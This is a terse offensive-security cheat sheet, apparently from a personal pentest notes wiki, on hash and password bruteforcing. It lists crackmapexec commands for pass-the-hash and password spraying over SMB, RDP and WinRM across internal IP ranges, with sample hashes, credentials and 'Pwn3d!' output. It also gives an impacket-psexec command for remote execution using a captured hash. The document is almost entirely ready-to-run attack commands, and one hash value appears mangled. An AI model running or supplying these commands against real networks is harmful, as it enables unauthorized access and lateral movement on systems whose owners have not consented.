password/hash bruteforcing

password/hash bruteforcing

  • crackmapexec smb -H ee0c207898a5bccc01f38115019ca2fb -u administrator --local-auth 10.21.1.20-24

    • example output: SCLIENT\administrator:ee0c207898a5bccc01f38115019ca2fbtrew (Pwn3d!) - already compromised SCLIENT7\administrator:ee0c207898a5bccc01f38115019ca2fbtrew (Pwn3d!)

    • impacket-psexec 'SCLIENT7/administrator@10.21.1.24' -hashes ':ee0c207898a5bccc01f38115019ca2fbtrew’

  • Also , when machine is part of Domain

    • crackmapexec smb -p Test! -u sario -d NETMED 172.16.124.82-83

  • Other service

    • RDP

      • crackmapexec rdp -p Test! -u sario -d NETMED 172.16.124.82-83

    • Winrm

      • crackmapexec winrm -p Test! -u sario -d NETMED 172.16.124.82-83

Last updated